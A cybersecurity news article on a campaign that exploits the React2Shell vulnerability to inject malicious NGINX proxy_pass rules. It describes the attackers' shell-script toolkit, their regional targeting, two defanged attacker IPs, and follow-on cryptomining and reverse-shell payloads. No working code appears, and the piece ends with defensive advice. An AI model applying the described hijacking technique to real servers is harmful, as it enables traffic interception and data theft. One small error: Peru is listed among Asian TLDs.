A pervasive and highly sophisticated web traffic hijacking campaign is actively compromising NGINX servers worldwide, leveraging a critical vulnerability to silently intercept and reroute user data through attacker-controlled infrastructure. This large-scale operation underscores a growing threat where the very architecture designed to manage and accelerate web traffic is weaponized against its users. The campaign’s success hinges on its stealth, as compromised servers continue to function normally, masking the malicious redirection occurring in the background. Threat actors are exploiting the trust between users and websites, turning legitimate digital destinations into conduits for their activities. Cybersecurity researchers have traced this activity to the exploitation of a severe vulnerability, revealing a methodical approach that targets specific web server configurations and geographic regions with alarming precision, leaving a trail of compromised systems that serve as unwitting accomplices in this widespread digital heist.
The Mechanics of The Hijacking Campaign
The foundation of this attack rests on the exploitation of React2Shell (CVE-2025-55182), a vulnerability assigned the maximum possible CVSS severity score of 10.0, indicating its critical nature and ease of exploitation. Upon gaining initial access to a vulnerable server, the threat actors focus their efforts on manipulating NGINX, one of the most popular open-source reverse proxy and load-balancing solutions. The primary tool for the hijack is the proxy_pass directive, a standard NGINX feature used to pass requests to backend servers. The attackers inject malicious location blocks into the NGINX configuration files. These carefully crafted blocks are designed to match specific URL paths. When a user sends a request to one of these paths, the malicious proxy_pass directive intercepts it and forwards it to the attackers’ own backend servers. The user’s communication is effectively hijacked, passing through the threat actor’s infrastructure before potentially reaching its intended destination, allowing for data interception, modification, or the serving of malicious content.
Further analysis of the campaign reveals the use of a multi-component toolkit that automates the compromise and ensures its persistence. This toolkit is composed of several specialized shell scripts, each with a distinct role in the attack chain. An orchestrator script, zx.sh, is responsible for downloading and executing the other components, cleverly using curl or wget and even capable of establishing a raw TCP connection to bypass security measures that might block these common utilities. Another script, bt.sh, is specifically designed to target environments using the popular Baota (BT) Management Panel, overwriting NGINX configurations within that specific ecosystem. To ensure the malicious directives are placed correctly, a script named 4zdh.sh enumerates common NGINX configuration file locations. A more targeted variant, zdh.sh, focuses on Linux or containerized NGINX instances, with a particular emphasis on servers located in specific regions. Finally, a reporting utility, ok.sh, generates a comprehensive list of all active traffic hijacking rules on the compromised server, allowing the attackers to maintain an inventory of their control.
Targeting and Post-Exploitation Tactics
The operators of this campaign have demonstrated a clear and strategic targeting methodology, concentrating their efforts on specific geographic and infrastructural assets. A significant portion of the observed attacks have been directed at Asian top-level domains (TLDs), including .in (India), .id (Indonesia), .pe (Peru), .bd (Bangladesh), and .th (Thailand). This regional focus suggests a calculated effort to exploit areas with a high concentration of vulnerable systems or specific strategic value to the attackers. Beyond geographical boundaries, the campaign also exhibits a preference for Chinese hosting infrastructure. In particular, systems managed with the Baota Panel have been heavily targeted, likely due to its widespread use and potentially common configuration weaknesses. The most concerning aspect of the targeting strategy is the focus on sensitive domains, with evidence showing that government (.gov) and educational (.edu) websites are actively being compromised, raising the stakes from simple traffic redirection to potential espionage and theft of sensitive institutional data.
The exploitation of the React2Shell vulnerability serves as a gateway for diverse post-exploitation payloads, indicating that multiple, independent threat actors may be leveraging the same initial access vector for different malicious ends. Threat intelligence firm GreyNoise has reported that a substantial 56% of observed exploitation attempts originated from just two IP addresses, 193.142.147[.]209 and 87.121.84[.]24. While both sources exploit the same vulnerability, their ultimate objectives diverge significantly. One set of attacks deploys cryptomining software, hijacking the server’s computational resources for financial gain by mining cryptocurrencies. In contrast, the other campaign focuses on establishing reverse shells, which provide the attacker with direct, interactive command-line access to the compromised system. This level of access is far more intrusive, enabling data exfiltration, lateral movement within the network, and the deployment of additional malware. This divergence highlights a coordinated but multifaceted threat landscape where a single vulnerability can fuel a wide range of cybercriminal activities.
Fortifying Defenses Against Covert Threats
The extensive campaign targeting NGINX servers served as a stark reminder of how fundamental web infrastructure could be subverted for malicious purposes. It demonstrated that even well-established and widely used technologies were not immune to sophisticated attacks that exploited both software vulnerabilities and common administrative practices. The attackers’ strategic focus on specific regions and high-value domains, such as government and educational institutions, underscored the calculated nature of modern cyber threats. The revelation that a single vulnerability was a gateway for varied payloads, from resource-draining cryptomining to deep-system-access reverse shells, illustrated the complex and layered motivations driving cybercrime. This incident prompted a renewed focus on proactive security measures, including timely patching, rigorous configuration management, and the deployment of advanced threat detection systems capable of identifying subtle anomalies indicative of a compromise. The defensive posture of the cybersecurity community shifted toward a model of assumed breach, where continuous monitoring and rapid response became paramount in mitigating the impact of such covert and persistent threats.
